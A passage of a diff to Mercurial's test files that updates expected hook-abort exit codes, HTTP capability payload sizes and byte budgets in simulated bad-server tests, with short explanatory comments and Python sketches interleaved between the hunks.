+ error: bork@2ef0ac749a14e4f57a5a822464a0902c6f7f448f: not found in manifest
[1]
try bad style
--- a/tests/test-hgwebdir.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-hgwebdir.t Tue Apr 20 11:01:06 2021 -0400
@@ -103,7 +103,7 @@
404 Not Found
- error: bork@8580ff50825a: not found in manifest
+ error: bork@8580ff50825a50c8f716709acdf8de0deddcd6ab: not found in manifest
[1]
should succeed
--- a/tests/test-histedit-edit.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-histedit-edit.t Tue Apr 20 11:01:06 2021 -0400
@@ -375,7 +375,7 @@
note: commit message saved in .hg/last-message.txt
note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it
abort: pretxncommit.unexpectedabort hook exited with status 1
- [255]
+ [40]
$ cat .hg/last-message.txt
f
@@ -400,7 +400,7 @@
note: commit message saved in .hg/last-message.txt
note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it
abort: pretxncommit.unexpectedabort hook exited with status 1
- [255]
+ [40]
$ cat >> .hg/hgrc <<EOF
> [hooks]
--- a/tests/test-histedit-fold.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-histedit-fold.t Tue Apr 20 11:01:06 2021 -0400
@@ -202,7 +202,7 @@
transaction abort!
rollback completed
abort: pretxncommit.abortfolding hook failed
- [255]
+ [40]
$ cat .hg/last-message.txt
f
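The [255] to [40] updates in test-histedit-edit.t and test-histedit-fold.t
above, and throughout test-hook.t below, track Mercurial's detailed exit
codes: hook aborts now exit with 40, while malformed input (the bad --config
cases in test-globalopts.t) exits with 10. An illustrative mapping only;
Mercurial derives the codes from its exception classes:

  EXIT_CODES = {
      "input-error": 10,  # e.g. malformed --config option
      "hook-abort": 40,   # e.g. pretxncommit hook exited with status 1
  }

  def exit_for(kind, default=255):
      # 255 stays the catch-all, e.g. the HTTP errors further below.
      return EXIT_CODES.get(kind, default)

  assert exit_for("hook-abort") == 40
  assert exit_for("network-error") == 255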
--- a/tests/test-histedit-non-commute-abort.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-histedit-non-commute-abort.t Tue Apr 20 11:01:06 2021 -0400
@@ -84,6 +84,7 @@
ancestor path: e (node 0000000000000000000000000000000000000000)
other path: e (node 6b67ccefd5ce6de77e7ead4f5292843a0255329f)
extra: ancestorlinknode = 0000000000000000000000000000000000000000
+ extra: merged = yes
$ hg resolve -l
U e
--- a/tests/test-hook.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-hook.t Tue Apr 20 11:01:06 2021 -0400
@@ -227,7 +227,7 @@
HG_PATS=[]
abort: pre-identify hook exited with status 1
- [255]
+ [40]
$ hg cat b
pre-cat hook: HG_ARGS=cat b
HG_HOOKNAME=pre-cat
@@ -390,7 +390,7 @@
HG_TAG=fa
abort: pretag.forbid hook exited with status 1
- [255]
+ [40]
$ hg tag -l fla
pretag hook: HG_HOOKNAME=pretag
HG_HOOKTYPE=pretag
@@ -405,7 +405,7 @@
HG_TAG=fla
abort: pretag.forbid hook exited with status 1
- [255]
+ [40]
pretxncommit hook can see changeset, can roll back txn, changeset no
more there after
@@ -451,7 +451,7 @@
rollback completed
abort: pretxncommit.forbid1 hook exited with status 1
- [255]
+ [40]
$ hg -q tip
4:539e4b31b6dc
@@ -485,7 +485,7 @@
HG_PARENT1=539e4b31b6dc99b3cfbaa6b53cbc1c1f9a1e3a10
abort: precommit.forbid hook exited with status 1
- [255]
+ [40]
$ hg -q tip
4:539e4b31b6dc
@@ -644,7 +644,7 @@
HG_URL=file:$TESTTMP/a
abort: prepushkey hook exited with status 1
- [255]
+ [40]
$ cd ../a
test that prelistkeys can prevent listing keys
@@ -679,7 +679,7 @@
HG_NAMESPACE=bookmarks
abort: prelistkeys hook exited with status 1
- [255]
+ [40]
$ cd ../a
$ rm .hg/hgrc
@@ -704,7 +704,7 @@
HG_URL=file:$TESTTMP/a
abort: prechangegroup.forbid hook exited with status 1
- [255]
+ [40]
pretxnchangegroup hook can see incoming changes, can roll back txn,
incoming changes no longer there after
@@ -735,7 +735,7 @@
transaction abort!
rollback completed
abort: pretxnchangegroup.forbid1 hook exited with status 1
- [255]
+ [40]
$ hg -q tip
3:07f3376c1e65
@@ -786,7 +786,7 @@
HG_SOURCE=pull
abort: preoutgoing.forbid hook exited with status 1
- [255]
+ [40]
outgoing hooks work for local clones
@@ -825,7 +825,7 @@
HG_SOURCE=clone
abort: preoutgoing.forbid hook exited with status 1
- [255]
+ [40]
$ cd "$TESTTMP/b"
@@ -915,7 +915,7 @@
hooktype preoutgoing
source pull
abort: preoutgoing.fail hook failed
- [255]
+ [40]
$ echo '[hooks]' > ../a/.hg/hgrc
$ echo 'preoutgoing.uncallable = python:hooktests.uncallable' >> ../a/.hg/hgrc
@@ -1283,7 +1283,7 @@
rollback completed
strip failed, backup bundle stored in * (glob)
abort: pretxnclose.error hook exited with status 1
- [255]
+ [40]
$ hg recover
no interrupted transaction available
[1]
@@ -1306,7 +1306,7 @@
transaction abort!
rollback completed
abort: pretxnclose hook exited with status 1
- [255]
+ [40]
$ cp .hg/store/00changelog.i.a.saved .hg/store/00changelog.i.a
(check (in)visibility of new changeset while transaction running in
@@ -1331,7 +1331,7 @@
transaction abort!
rollback completed
abort: pretxnclose hook exited with status 1
- [255]
+ [40]
Hook from untrusted hgrc are reported as failure
================================================
@@ -1382,7 +1382,7 @@
rollback completed
abort: untrusted hook pretxnclose.testing not executed
(see 'hg help config.trusted')
- [255]
+ [40]
$ hg log
changeset: 0:3903775176ed
tag: tip
@@ -1407,12 +1407,12 @@
$ cat << EOF >> .hg/hgrc
> [hooks]
- > pre-version.testing-default=echo '### default ###' plain: \${HGPLAIN:-'<unset>'}
- > pre-version.testing-yes=echo '### yes #######' plain: \${HGPLAIN:-'<unset>'}
+ > pre-version.testing-default=sh -c "echo '### default ###' plain: \${HGPLAIN:-'<unset>'}"
+ > pre-version.testing-yes=sh -c "echo '### yes #######' plain: \${HGPLAIN:-'<unset>'}"
> pre-version.testing-yes:run-with-plain=yes
- > pre-version.testing-no=echo '### no ########' plain: \${HGPLAIN:-'<unset>'}
+ > pre-version.testing-no=sh -c "echo '### no ########' plain: \${HGPLAIN:-'<unset>'}"
> pre-version.testing-no:run-with-plain=no
- > pre-version.testing-auto=echo '### auto ######' plain: \${HGPLAIN:-'<unset>'}
+ > pre-version.testing-auto=sh -c "echo '### auto ######' plain: \${HGPLAIN:-'<unset>'}"
> pre-version.testing-auto:run-with-plain=auto
> EOF
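The sh -c wrapping above is presumably there because these hook commands lean
on POSIX parameter expansion: ${HGPLAIN:-'<unset>'} only means something when
a shell interprets it, so the command spells out the shell instead of
depending on how the hook gets spawned. A standalone illustration of the
difference:

  import subprocess

  cmd = "echo plain: ${HGPLAIN:-'<unset>'}"

  # With sh -c, the parameter expansion happens as the hook expects.
  subprocess.run(["sh", "-c", cmd],
                 env={"HGPLAIN": "1", "PATH": "/bin:/usr/bin"})
  # prints: plain: 1
  subprocess.run(["sh", "-c", cmd], env={"PATH": "/bin:/usr/bin"})
  # prints: plain: <unset>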
--- a/tests/test-http-bad-server.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-http-bad-server.t Tue Apr 20 11:01:06 2021 -0400
@@ -13,6 +13,7 @@
> fakeversion = `pwd`/fakeversion.py
> [format]
> sparse-revlog = no
+ > use-persistent-nodemap = no
> [devel]
> legacy.exchange = phases
> [server]
@@ -118,17 +119,17 @@
readline(115 from *) -> (*) host: localhost:$HGPORT\r\n (glob)
readline(* from *) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob)
readline(* from *) -> (2) \r\n (glob)
- sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !)
- sendall(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !)
- write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !)
- write(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !)
+ sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !)
+ sendall(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !)
+ write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !)
+ write(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !)
write(36) -> HTTP/1.1 200 Script output follows\r\n (no-py3 !)
write(23) -> Server: badhttpserver\r\n (no-py3 !)
write(37) -> Date: $HTTP_DATE$\r\n (no-py3 !)
write(41) -> Content-Type: application/mercurial-0.1\r\n (no-py3 !)
- write(21) -> Content-Length: 450\r\n (no-py3 !)
+ write(21) -> Content-Length: 431\r\n (no-py3 !)
write(2) -> \r\n (no-py3 !)
- write(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !)
+ write(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !)
readline(4? from 65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n (glob)
readline(1? from *) -> (1?) Accept-Encoding* (glob)
read limit reached; closing socket
@@ -163,17 +164,17 @@
readline(213 from *) -> (*) host: localhost:$HGPORT\r\n (glob)
readline(* from *) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob)
readline(* from *) -> (2) \r\n (glob)
- sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !)
- sendall(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !)
- write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !)
- write(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !)
+ sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !)
+ sendall(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !)
+ write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !)
+ write(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !)
write(36) -> HTTP/1.1 200 Script output follows\r\n (no-py3 !)
write(23) -> Server: badhttpserver\r\n (no-py3 !)
write(37) -> Date: $HTTP_DATE$\r\n (no-py3 !)
write(41) -> Content-Type: application/mercurial-0.1\r\n (no-py3 !)
- write(21) -> Content-Length: 450\r\n (no-py3 !)
+ write(21) -> Content-Length: 431\r\n (no-py3 !)
write(2) -> \r\n (no-py3 !)
- write(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !)
+ write(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !)
readline(13? from 65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n (glob)
readline(1?? from *) -> (27) Accept-Encoding: identity\r\n (glob)
readline(8? from *) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob)
@@ -228,17 +229,17 @@
readline(234 from *) -> (2?) host: localhost:$HGPORT\r\n (glob)
readline(* from *) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob)
readline(* from *) -> (2) \r\n (glob)
- sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 463\r\n\r\n (py36 !)
- sendall(463) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !)
- write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 463\r\n\r\n (py3 no-py36 !)
- write(463) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !)
+ sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 444\r\n\r\n (py36 !)
+ sendall(444) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !)
+ write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 444\r\n\r\n (py3 no-py36 !)
+ write(444) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !)
write(36) -> HTTP/1.1 200 Script output follows\r\n (no-py3 !)
write(23) -> Server: badhttpserver\r\n (no-py3 !)
write(37) -> Date: $HTTP_DATE$\r\n (no-py3 !)
write(41) -> Content-Type: application/mercurial-0.1\r\n (no-py3 !)
- write(21) -> Content-Length: 463\r\n (no-py3 !)
+ write(21) -> Content-Length: 444\r\n (no-py3 !)
write(2) -> \r\n (no-py3 !)
- write(463) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !)
+ write(444) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !)
readline(1?? from 65537) -> (27) POST /?cmd=batch HTTP/1.1\r\n (glob)
readline(1?? from *) -> (27) Accept-Encoding: identity\r\n (glob)
readline(1?? from *) -> (41) content-type: application/mercurial-0.1\r\n (glob)
@@ -296,7 +297,7 @@
Traceback (most recent call last):
Exception: connection closed after sending N bytes
- write(286) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\nHTTP/1.1 500 Internal Server Error\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nTransfer-Encoding: chunked\r\n\r\n (py3 no-py36 !)
+ write(286) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\nHTTP/1.1 500 Internal Server Error\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nTransfer-Encoding: chunked\r\n\r\n (py3 no-py36 !)
write(36) -> HTTP/1.1 500 Internal Server Error\r\n (no-py3 !)
$ rm -f error.log
@@ -307,7 +308,7 @@
$ cat hg.pid > $DAEMON_PIDS
$ hg clone http://localhost:$HGPORT/ clone
- abort: HTTP request error (incomplete response; expected 450 bytes got 20)
+ abort: HTTP request error (incomplete response; expected 431 bytes got 20)
(this may be an intermittent network failure; if the error persists, consider contacting the network or server operator)
[255]
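Two things drive the churn in this file. The capability payload shrinks from
450 to 431 bytes, a 19-byte difference that matches dropping rev-branch-cache
(plus its %0A separator) from the bundle2 capability blob, as the x-hgarg-1
line further down shows; every closeaftersendbytes budget shifts accordingly.
The badserver mechanism itself is easy to picture; a sketch of a send wrapper
that closes the socket once its byte budget is spent, in the spirit of the
test extension rather than its actual code:

  class ByteLimitedSocket:
      """Close the wrapped socket after `budget` bytes have been sent."""

      def __init__(self, sock, budget):
          self.sock = sock
          self.budget = budget

      def sendall(self, data):
          allowed = data[:self.budget]
          self.sock.sendall(allowed)  # e.g. "sendall(20 from 431) -> (0)"
          self.budget -= len(allowed)
          if self.budget <= 0:
              # logs then show "write limit reached; closing socket"
              self.sock.close()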
@@ -320,17 +321,17 @@
readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob)
readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob)
readline(*) -> (2) \r\n (glob)
- sendall(160 from 160) -> (20) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !)
- sendall(20 from 450) -> (0) batch branchmap bund (py36 !)
- write(160 from 160) -> (20) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !)
- write(20 from 450) -> (0) batch branchmap bund (py3 no-py36 !)
+ sendall(160 from 160) -> (20) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !)
+ sendall(20 from 431) -> (0) batch branchmap bund (py36 !)
+ write(160 from 160) -> (20) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !)
+ write(20 from 431) -> (0) batch branchmap bund (py3 no-py36 !)
write(36 from 36) -> (144) HTTP/1.1 200 Script output follows\r\n (no-py3 !)
write(23 from 23) -> (121) Server: badhttpserver\r\n (no-py3 !)
write(37 from 37) -> (84) Date: $HTTP_DATE$\r\n (no-py3 !)
write(41 from 41) -> (43) Content-Type: application/mercurial-0.1\r\n (no-py3 !)
- write(21 from 21) -> (22) Content-Length: 450\r\n (no-py3 !)
+ write(21 from 21) -> (22) Content-Length: 431\r\n (no-py3 !)
write(2 from 2) -> (20) \r\n (no-py3 !)
- write(20 from 450) -> (0) batch branchmap bund (no-py3 !)
+ write(20 from 431) -> (0) batch branchmap bund (no-py3 !)
write limit reached; closing socket
$LOCALIP - - [$ERRDATE$] Exception happened during processing request '/?cmd=capabilities': (glob)
Traceback (most recent call last):
@@ -341,7 +342,7 @@
Server sends incomplete headers for batch request
- $ hg serve --config badserver.closeaftersendbytes=728 -p $HGPORT -d --pid-file=hg.pid -E error.log
+ $ hg serve --config badserver.closeaftersendbytes=709 -p $HGPORT -d --pid-file=hg.pid -E error.log
$ cat hg.pid > $DAEMON_PIDS
TODO this output is horrible
@@ -363,17 +364,17 @@
readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob)
readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob)
readline(*) -> (2) \r\n (glob)
- sendall(160 from 160) -> (568) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !)
- sendall(450 from 450) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !)
- write(160 from 160) -> (568) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !)
- write(450 from 450) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !)
- write(36 from 36) -> (692) HTTP/1.1 200 Script output follows\r\n (no-py3 !)
- write(23 from 23) -> (669) Server: badhttpserver\r\n (no-py3 !)
- write(37 from 37) -> (632) Date: $HTTP_DATE$\r\n (no-py3 !)
- write(41 from 41) -> (591) Content-Type: application/mercurial-0.1\r\n (no-py3 !)
- write(21 from 21) -> (570) Content-Length: 450\r\n (no-py3 !)
- write(2 from 2) -> (568) \r\n (no-py3 !)
- write(450 from 450) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !)
+ sendall(160 from 160) -> (549) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !)
+ sendall(431 from 431) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !)
+ write(160 from 160) -> (568) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !)
+ write(431 from 431) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !)
+ write(36 from 36) -> (673) HTTP/1.1 200 Script output follows\r\n (no-py3 !)
+ write(23 from 23) -> (650) Server: badhttpserver\r\n (no-py3 !)
+ write(37 from 37) -> (613) Date: $HTTP_DATE$\r\n (no-py3 !)
+ write(41 from 41) -> (572) Content-Type: application/mercurial-0.1\r\n (no-py3 !)
+ write(21 from 21) -> (551) Content-Length: 431\r\n (no-py3 !)
+ write(2 from 2) -> (549) \r\n (no-py3 !)
+ write(431 from 431) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !)
readline(65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n
readline(*) -> (27) Accept-Encoding: identity\r\n (glob)
readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob)
@@ -401,7 +402,7 @@
Server sends an incomplete HTTP response body to batch request
- $ hg serve --config badserver.closeaftersendbytes=793 -p $HGPORT -d --pid-file=hg.pid -E error.log
+ $ hg serve --config badserver.closeaftersendbytes=774 -p $HGPORT -d --pid-file=hg.pid -E error.log
$ cat hg.pid > $DAEMON_PIDS
TODO client spews a stack due to uncaught ValueError in batch.results()
@@ -422,17 +423,17 @@
readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob)
readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob)
readline(*) -> (2) \r\n (glob)
- sendall(160 from 160) -> (633) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !)
- sendall(450 from 450) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !)
- write(160 from 160) -> (633) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !)
- write(450 from 450) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !)
- write(36 from 36) -> (757) HTTP/1.1 200 Script output follows\r\n (no-py3 !)
- write(23 from 23) -> (734) Server: badhttpserver\r\n (no-py3 !)
- write(37 from 37) -> (697) Date: $HTTP_DATE$\r\n (no-py3 !)
- write(41 from 41) -> (656) Content-Type: application/mercurial-0.1\r\n (no-py3 !)
- write(21 from 21) -> (635) Content-Length: 450\r\n (no-py3 !)
- write(2 from 2) -> (633) \r\n (no-py3 !)
- write(450 from 450) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !)
+ sendall(160 from 160) -> (614) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !)
+ sendall(431 from 431) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !)
